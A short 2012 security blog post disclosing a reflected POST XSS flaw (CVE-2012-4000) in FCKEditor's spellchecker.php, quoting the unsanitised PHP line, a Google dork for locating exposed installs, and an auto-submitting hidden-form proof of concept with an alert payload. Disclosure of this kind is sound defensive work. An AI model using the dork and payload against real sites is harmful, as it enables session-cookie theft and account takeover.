FCKEditor reflected XSS vulnerability

June 22, 2012

I recently found a reflected POST XSS on a popular web WYSIWYG editor called FCKEditor. Despite is almost end-of-life and replaced with CKEditor since 2009, FCKEditor is still popular as stand-alone application as embedded in different Wordpress/Joomla/Drupal extensions.

Today the 2012-06-22, Google counts more than 1,5 billion of results. A plausbile Google dork filtering out PHP sources could be

inurl:fck_spellerpages/spellerpages/server-scripts/ -“The following variables”


The reflected XSS is injected through textinputs POST parameter array, not sanized and printed in line 27:

echo "textinputs[$key] = decodeURIComponent(\"" . $val . "\");\n";

As usual, attackers can exploit the reflected XSS to execute arbitrary HTML and script code in a user’s browser session that visit the malicious page, which can be exploited to e.g. steal the cookie of the legitimate user to bypass the CMS authorization. The PoC is CRSF-like due to POST HTTP method.

<iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe>
  <form method="post" name="sender"
   action="http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" target="hidden">
   <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' />
<script>document.sender.submit(); </script>


The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-4000 to the vulnerability


comments powered by Disqus